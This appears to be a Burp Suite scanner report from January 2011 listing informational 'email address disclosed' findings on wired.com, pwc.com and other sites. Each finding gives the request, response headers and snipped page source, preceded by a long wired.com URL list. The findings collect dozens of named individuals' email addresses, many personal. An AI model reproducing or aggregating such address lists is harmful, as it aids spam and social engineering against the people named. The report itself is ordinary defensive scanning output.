http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/&hl=en&client=ca-pub-9817987453265044&adU=Verizon.com&adT=Verizon+Internet+-+%2419.99&adU=www.Brocade.com&adT=Ethernet+Fabrics&adU=www.Comcast.com&adT=Comcast%C2%AE+High+Speed&adU=www.google.com/nexus&adT=The+New+Google+Nexus+S&gl=US/x26usg/x3dAFQjCNGTF4DW2TDGEnchvTvU-Xc_zM5wgQ
http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/&t=WikiLeaks%20Cables%20Cited%20in%20Lawsuit%20Over%20$500%20Million%20Sunken%20Treasure
http://www.wired.com/threatlevel/author/kimzetter/
http://www.wired.com/threatlevel/category/announcements/
http://www.wired.com/threatlevel/category/atm-hacking/
http://www.wired.com/threatlevel/category/bittorrent/
http://www.wired.com/threatlevel/category/black-hat-conference/
http://www.wired.com/threatlevel/category/bradley-manning/
http://www.wired.com/threatlevel/category/breaches/
http://www.wired.com/threatlevel/category/censorship/
http://www.wired.com/threatlevel/category/chaos-computer-club/
http://www.wired.com/threatlevel/category/conferences/
http://www.wired.com/threatlevel/category/copyrights-and-patents/
http://www.wired.com/threatlevel/category/coverups/
http://www.wired.com/threatlevel/category/crime/
http://www.wired.com/threatlevel/category/crypto/
http://www.wired.com/threatlevel/category/cybarmageddon/
http://www.wired.com/threatlevel/category/cyber-warfare/
http://www.wired.com/threatlevel/category/cyberbullying/
http://www.wired.com/threatlevel/category/cybersecurity/
http://www.wired.com/threatlevel/category/defcon/
http://www.wired.com/threatlevel/category/digital-millennium-copyright-act/
http://www.wired.com/threatlevel/category/e-voting/
http://www.wired.com/threatlevel/category/elections/
http://www.wired.com/threatlevel/category/fed-blotter/
http://www.wired.com/threatlevel/category/glitches-and-bugs/
http://www.wired.com/threatlevel/category/hacks-and-cracks/
http://www.wired.com/threatlevel/category/hans-reiser-trial/
http://www.wired.com/threatlevel/category/identification/
http://www.wired.com/threatlevel/category/intellectual-property/
http://www.wired.com/threatlevel/category/lori-drew-trial/
http://www.wired.com/threatlevel/category/network-neutrality/
http://www.wired.com/threatlevel/category/nsa/
http://www.wired.com/threatlevel/category/openleaks/
http://www.wired.com/threatlevel/category/politics/
http://www.wired.com/threatlevel/category/porn/
http://www.wired.com/threatlevel/category/privacy/
http://www.wired.com/threatlevel/category/rfid/
http://www.wired.com/threatlevel/category/riaa-litigation/
http://www.wired.com/threatlevel/category/rsa-conference/
http://www.wired.com/threatlevel/category/sexting/
http://www.wired.com/threatlevel/category/spooks-gone-wild/
http://www.wired.com/threatlevel/category/stuxnet/
http://www.wired.com/threatlevel/category/sunshine-and-secrecy/
http://www.wired.com/threatlevel/category/surveillance/
http://www.wired.com/threatlevel/category/the-courts/
http://www.wired.com/threatlevel/category/the-ridiculous/
http://www.wired.com/threatlevel/category/threats/
http://www.wired.com/threatlevel/category/three-strikes/
http://www.wired.com/threatlevel/category/tsa/
http://www.wired.com/threatlevel/category/uncategorized/
http://www.wired.com/threatlevel/category/watchlists/
http://www.wired.com/threatlevel/category/wikileaks/
http://www.wired.com/threatlevel/category/yo-ho-ho/
http://www.wired.com/threatlevel/tag/4chan/
http://www.wired.com/threatlevel/tag/aclu/
http://www.wired.com/threatlevel/tag/al-haramain/
http://www.wired.com/threatlevel/tag/albert-gonzalez/
http://www.wired.com/threatlevel/tag/apple-iphone/
http://www.wired.com/threatlevel/tag/blackhat/
http://www.wired.com/threatlevel/tag/bradley-manning/
http://www.wired.com/threatlevel/tag/carding/
http://www.wired.com/threatlevel/tag/ccc/
http://www.wired.com/threatlevel/tag/censorship/
http://www.wired.com/threatlevel/tag/china/
http://www.wired.com/threatlevel/tag/copyright/
http://www.wired.com/threatlevel/tag/crime/
http://www.wired.com/threatlevel/tag/defcon/
http://www.wired.com/threatlevel/tag/dmca/
http://www.wired.com/threatlevel/tag/facebook/
http://www.wired.com/threatlevel/tag/fbi/
http://www.wired.com/threatlevel/tag/file-sharing/
http://www.wired.com/threatlevel/tag/first-amendment/
http://www.wired.com/threatlevel/tag/google/
http://www.wired.com/threatlevel/tag/hack/
http://www.wired.com/threatlevel/tag/hacking/
http://www.wired.com/threatlevel/tag/intellectual-property/
http://www.wired.com/threatlevel/tag/mpaa/
http://www.wired.com/threatlevel/tag/nsa/
http://www.wired.com/threatlevel/tag/obama/
http://www.wired.com/threatlevel/tag/piracy/
http://www.wired.com/threatlevel/tag/pirate-bay-trial/
http://www.wired.com/threatlevel/tag/pirate-bay/
http://www.wired.com/threatlevel/tag/politics/
http://www.wired.com/threatlevel/tag/privacy/
http://www.wired.com/threatlevel/tag/riaa/
http://www.wired.com/threatlevel/tag/segvec/
http://www.wired.com/threatlevel/tag/supreme-court/
http://www.wired.com/threatlevel/tag/surveillance/
http://www.wired.com/threatlevel/tag/tjx/
http://www.wired.com/threatlevel/tag/tsa/
http://www.wired.com/threatlevel/tag/twitter/
http://www.wired.com/threatlevel/tag/virginia-tech-shootings/
http://www.wired.com/threatlevel/tag/wikileaks/
http://www.wired.com/underwire/
http://www.wired.com/wiredscience/

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

18.1. http://dean.edwards.name/weblog/2006/03/base/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dean.edwards.name
Path:	/weblog/2006/03/base/

Issue detail

The following email addresses were disclosed in the response:

aaron.newton@cnet.com
sam@conio.net

Request

GET /weblog/2006/03/base/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 12:59:44 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Link: <http://dean.edwards.name/weblog/?p=66>; rel=shortlink
Expires: Wed, 12 Jan 2011 12:59:44 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 175763

<!doctype html>
<html>
<head>
<title>Dean Edwards: A Base Class for JavaScript Inheritance</title>
<meta name="author" content="Dean Edwards">
<link rel="styleshe
...[SNIP]...
<a href="mailto:sam@conio.net">sam@conio.net</a>, MIT-style license -Belgelendirme Aaron Newton(aaron.newton@cnet.com) and Valerio Proietti taraf..ndan yap..lm....t..r. [...]</p>
...[SNIP]...

18.2. http://landesm.gfi.com/event-log-analysis-sm/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://landesm.gfi.com
Path:	/event-log-analysis-sm/

Issue detail

The following email address was disclosed in the response:

sales@gfi.com

Request

GET /event-log-analysis-sm/ HTTP/1.1
Host: landesm.gfi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.3. http://lists.arin.net/mailman/listinfo/arin-whoisrws previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lists.arin.net
Path:	/mailman/listinfo/arin-whoisrws

Issue detail

The following email address was disclosed in the response:

arin-whoisrws-owner@arin.net

Request

GET /mailman/listinfo/arin-whoisrws HTTP/1.1
Host: lists.arin.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.4. http://www.ccmaine.net/ContactUs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ccmaine.net
Path:	/ContactUs

Issue detail

The following email addresses were disclosed in the response:

billing@ccmaine.net
info@ccmaine.net

Request

GET /ContactUs HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/TechnicalSupport
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 12:59:27 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: c17c5a48cd2d2c26028b769e1e7975a2
Content-Length: 4199
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Cornerstone Communi
...[SNIP]...
<a class="mailto" href="mailto:info@ccmaine.net">info@ccmaine.net</a></td><td><a class="mailto" href="mailto:billing@ccmaine.net">billing@ccmaine.net</a>
...[SNIP]...

18.5. http://www.pwc.com/WTS/WebTrendsServlet.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pwc.com
Path:	/WTS/WebTrendsServlet.js

Issue detail

The following email address was disclosed in the response:

webmaster@pwc.com

Request

GET /WTS/WebTrendsServlet.js?id=gx&locale=en_GX HTTP/1.1
Host: www.pwc.com
Proxy-Connection: keep-alive
Referer: http://www.pwc.com/en_GX/webadmin/forms/contactUs.jhtml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LD.previous.visitor.us.pwc.com=true; __utmz=257467274.1294756485.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=price%20waterhouse; __utma=257467274.728746398.1294756485.1294756485.1294756485.1; __utmc=257467274; PWC_WOD=id=173.193.214.243-2605364368.30126492:lv=1294760111214:ss=1294760084820

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Vary: Accept-Encoding
P3P: policyref="http://www.pwc.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMi PUBi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA"
Content-Type: text/html
Content-Language: en-US
Date: Wed, 12 Jan 2011 03:26:01 GMT
Connection: close
Content-Length: 14503

function domainValidation(){
   var thisServer = "submit.pwc.com";
   var isValidDomain = "true";
   var isStagingDomain = "false";
   if (isValidDomain == "true"){
       return "approved";
   }
   if (isStagi
...[SNIP]...
name == ""){docLocation = "[Local]"}
   alert("Unauthorised Usage. \n\nThe domain " + docLocation + " is not authorised to access or \nexecute some code within this page. \n\nIf you wish, please notify webmaster@pwc.com of the page you are trying to \naccess so that we may investigate further.\n\nApologies for any inconvenience this may cause.");
   return "";
}
var willDo = domainValidation();

// <!-- START OF S
...[SNIP]...

18.6. http://www.pwc.com/en_GX/webadmin/assets/script/activatedlogo.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pwc.com
Path:	/en_GX/webadmin/assets/script/activatedlogo.js

Issue detail

The following email address was disclosed in the response:

jmyers@momentdesign.com

Request

GET /en_GX/webadmin/assets/script/activatedlogo.js HTTP/1.1
Host: www.pwc.com
Proxy-Connection: keep-alive
Referer: http://www.pwc.com/us/en/index.jhtml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LD.previous.visitor.us.pwc.com=true

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 29 Sep 2010 08:10:07 GMT
ETag: "4447e-21fe-7d4ec256"
Accept-Ranges: bytes
Vary: Accept-Encoding
P3P: policyref="http://www.pwc.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMi PUBi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA"
Content-Type: application/x-javascript
Date: Tue, 11 Jan 2011 14:34:07 GMT
Connection: close
Content-Length: 8702

/**
* @fileoverview This file is to be used to build PWC feature module
*
* @author Jef Myers jmyers@momentdesign.com
* @version 0.1
*/

$(document).ready(function(){Feature.init();});

/**
* Construct a new Feature object
* @class This is the basic Feature singleton class.
* @constructor
*/
var
...[SNIP]...

18.7. http://www.sentinelinvestments.com/inc/js/jquery.cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sentinelinvestments.com
Path:	/inc/js/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

klaus.hartl@stilbuero.de

Request

GET /inc/js/jquery.cookie.js HTTP/1.1
Accept: */*
Referer: http://www.sentinelinvestments.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.sentinelinvestments.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=qmis707mdaq9bcgqjvjtrnmke6

Response

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 14:07:22 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Fri, 12 Jun 2009 00:16:33 GMT
ETag: "e017f-1113-9eeb9a40"
Accept-Ranges: bytes
Content-Length: 4371
Content-Type: application/x-javascript

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

18.8. http://www.sentinelinvestments.com/inc/js/jquery.hoverIntent.minified.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sentinelinvestments.com
Path:	/inc/js/jquery.hoverIntent.minified.js

Issue detail

The following email address was disclosed in the response:

brian@cherne.net

Request

GET /inc/js/jquery.hoverIntent.minified.js HTTP/1.1
Accept: */*
Referer: http://www.sentinelinvestments.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.sentinelinvestments.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=qmis707mdaq9bcgqjvjtrnmke6

Response

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 14:07:22 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Fri, 12 Jun 2009 00:16:33 GMT
ETag: "e0180-649-9eeb9a40"
Accept-Ranges: bytes
Content-Length: 1609
Content-Type: application/x-javascript

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @par
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

18.9. http://www.sentinelinvestments.com/inc/js/jquery.tablesorter.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sentinelinvestments.com
Path:	/inc/js/jquery.tablesorter.js

Issue detail

The following email address was disclosed in the response:

christian.bach@polyester.se

Request

GET /inc/js/jquery.tablesorter.js HTTP/1.1
Accept: */*
Referer: http://www.sentinelinvestments.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.sentinelinvestments.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=qmis707mdaq9bcgqjvjtrnmke6

Response

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 14:07:22 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Fri, 12 Jun 2009 00:16:34 GMT
ETag: "e0182-5b46-9efadc80"
Accept-Ranges: bytes
Content-Length: 23366
Content-Type: application/x-javascript

/*
*
* TableSorter 2.0 - Client-side table sorting with ease!
* Version 2.0.3
* @requires jQuery v1.2.3
*
* Copyright (c) 2007 Christian Bach
* Examples and docs at: http://tablesorter.com
*
...[SNIP]...
ean flag indicating if tablesorter should display debuging information usefull for development.
*
* @type jQuery
*
* @name tablesorter
*
* @cat Plugins/Tablesorter
*
* @author Christian Bach/christian.bach@polyester.se
*/

(function($) {
   $.extend({
       tablesorter: new function() {

           var parsers = [], widgets = [];

           this.defaults = {
               cssHeader: "header",
               cssAsc: "headerSortUp",
               cssDesc: "heade
...[SNIP]...

18.10. http://www.sentinelinvestments.com/inc/js/lightbox/scripts/prototype.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sentinelinvestments.com
Path:	/inc/js/lightbox/scripts/prototype.js

Issue detail

The following email address was disclosed in the response:

sam@conio.net

Request

GET /inc/js/lightbox/scripts/prototype.js HTTP/1.1
Accept: */*
Referer: http://www.sentinelinvestments.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.sentinelinvestments.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=qmis707mdaq9bcgqjvjtrnmke6

Response

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 14:07:21 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Fri, 12 Jun 2009 00:16:37 GMT
ETag: "e018f-c119-9f28a340"
Accept-Ranges: bytes
Content-Length: 49433
Content-Type: application/x-javascript

/* Prototype JavaScript framework, version 1.4.0
* (c) 2005 Sam Stephenson <sam@conio.net>
*
* THIS FILE IS AUTOMATICALLY GENERATED. When sending patches, please diff
* against the source
...[SNIP]...

18.11. http://www.tukui.org/v2/tukloadx-mac-os-auto-update/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tukui.org
Path:	/v2/tukloadx-mac-os-auto-update/

Issue detail

The following email address was disclosed in the response:

yasima@eclipse-network.de

Request

GET /v2/tukloadx-mac-os-auto-update/ HTTP/1.1
Host: www.tukui.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 14:59:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www.tukui.org/v2/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 67342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/xfn/11">
<meta
...[SNIP]...
<a href="mailto:yasima@eclipse-network.de">yasima@eclipse-network.de</a>
...[SNIP]...

18.12. http://www.tukui.org/v2/tukui/contact/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tukui.org
Path:	/v2/tukui/contact/

Issue detail

The following email address was disclosed in the response:

tukz@tukui.org

Request

GET /v2/tukui/contact/ HTTP/1.1
Host: www.tukui.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 14:58:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www.tukui.org/v2/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/xfn/11">
<meta
...[SNIP]...
<input type="hidden" id="myemail" name="myemail" value="tukz@tukui.org" />
...[SNIP]...

18.13. http://www.wired.com/about/faq/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/about/faq/

Issue detail

The following email addresses were disclosed in the response:

kathrina_manalac@wired.com
louise_knapp@condenast.com
reprints@wiredmag.com
subscriptions@wiredmag.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:08:37 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:48:34 GMT
Date: Wed, 12 Jan 2011 15:40:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="mailto:subscriptions@wiredmag.com">subscriptions@wiredmag.com</a>
...[SNIP]...
<a href="mailto:subscriptions@wiredmag.com">subscriptions@wiredmag.com</a>
...[SNIP]...
<a href="mailto:louise_knapp@condenast.com">
...[SNIP]...
<a href="mailto:reprints@wiredmag.com">reprints@wiredmag.com</a>
...[SNIP]...
<a href="mailto:kathrina_manalac@wired.com">
...[SNIP]...

18.14. http://www.wired.com/about/press/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/about/press/

Issue detail

The following email addresses were disclosed in the response:

Rachel_millner@condenast.com
samantha_rosenthal@condenast.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:08:49 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=446
Expires: Wed, 12 Jan 2011 15:48:03 GMT
Date: Wed, 12 Jan 2011 15:40:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="mailto:samantha_rosenthal@condenast.com">samantha_rosenthal@condenast.com</a>
...[SNIP]...
<a href="mailto:Rachel_millner@condenast.com">Rachel_millner@condenast.com</a>
...[SNIP]...

18.15. http://www.wired.com/about/privacy-policy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/about/privacy-policy/

Issue detail

The following email address was disclosed in the response:

Privacy_administration@condenast.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:45:55 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=438
Expires: Wed, 12 Jan 2011 15:48:09 GMT
Date: Wed, 12 Jan 2011 15:40:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="mailto:Privacy_administration@condenast.com">Privacy_administration@condenast.com</a>
...[SNIP]...

18.16. http://www.wired.com/about/user-agreement/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/about/user-agreement/

Issue detail

The following email addresses were disclosed in the response:

copyright@sbandg.com
privacy@condenast.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:09:15 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=462
Expires: Wed, 12 Jan 2011 15:48:30 GMT
Date: Wed, 12 Jan 2011 15:40:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<br/>E-mail: copyright@sbandg.com</td>
...[SNIP]...
<a href="mailto:privacy@condenast.com">privacy@condenast.com</a>
...[SNIP]...

18.17. http://www.wired.com/autopia/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/autopia/

Issue detail

The following email addresses were disclosed in the response:

Jkambitsis.wired@gmail.com
chuck_squatriglia@wired.com
darryl_siry@wired.com
davedemerjian@gmail.com
keith.barry@gmail.com
michael_calore@wired.com
paurjason@gmail.com
tips@jalopnik.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:33:06 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=383
Expires: Wed, 12 Jan 2011 15:44:57 GMT
Date: Wed, 12 Jan 2011 15:38:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:michael_calore@wired.com">
...[SNIP]...
<a href="mailto:chuck_squatriglia@wired.com">
...[SNIP]...
<a href="mailto:paurjason@gmail.com">
...[SNIP]...
<a href="mailto:chuck_squatriglia@wired.com">
...[SNIP]...
<a href="mailto:tips@jalopnik.com">
...[SNIP]...
<a href="mailto:chuck_squatriglia@wired.com">
...[SNIP]...
<a href="mailto:chuck_squatriglia@wired.com">
...[SNIP]...
<a href="mailto:chuck_squatriglia@wired.com">
...[SNIP]...
<a href="mailto:keith.barry@gmail.com">
...[SNIP]...
<a href="mailto:tips@jalopnik.com">
...[SNIP]...
<a href="mailto:chuck_squatriglia@wired.com">
...[SNIP]...
<a href="mailto:keith.barry@gmail.com">
...[SNIP]...
<a href="mailto:paurjason@gmail.com">
...[SNIP]...
<a href="mailto: Jkambitsis.wired@gmail.com">
...[SNIP]...
<a href="mailto: davedemerjian@gmail.com">
...[SNIP]...
<a href="mailto: darryl_siry@wired.com">
...[SNIP]...
<a href="mailto:chuck_squatriglia@wired.com">
...[SNIP]...

18.18. http://www.wired.com/autopia/2011/01/study-renewable-fuel-mandate-cant-be-met-with-ethanol/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/autopia/2011/01/study-renewable-fuel-mandate-cant-be-met-with-ethanol/

Issue detail

The following email addresses were disclosed in the response:

Jkambitsis.wired@gmail.com
chuck_squatriglia@wired.com
darryl_siry@wired.com
davedemerjian@gmail.com
jtimmer@arstechnica.com
keith.barry@gmail.com
paurjason@gmail.com

Request

Response

18.19. http://www.wired.com/dangerroom/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/dangerroom/

Issue detail

The following email addresses were disclosed in the response:

ArmsControlWonk@gmail.com
armchairgeneralist@yahoo.com
d_hambling@hotmail.com
danger_room@wired.com
david_axe@hotmail.com
katiedrumm@gmail.com
kris.alexander@gmail.com
michael.peck1@gmail.com
michael.tanji@threatswatch.org
nick@nickthompson.com
nohodge@gmail.com
sharonweinberger@gmail.com
spencerackerman@gmail.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/dangerroom/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:38:00 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=420
Expires: Wed, 12 Jan 2011 15:45:49 GMT
Date: Wed, 12 Jan 2011 15:38:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126060

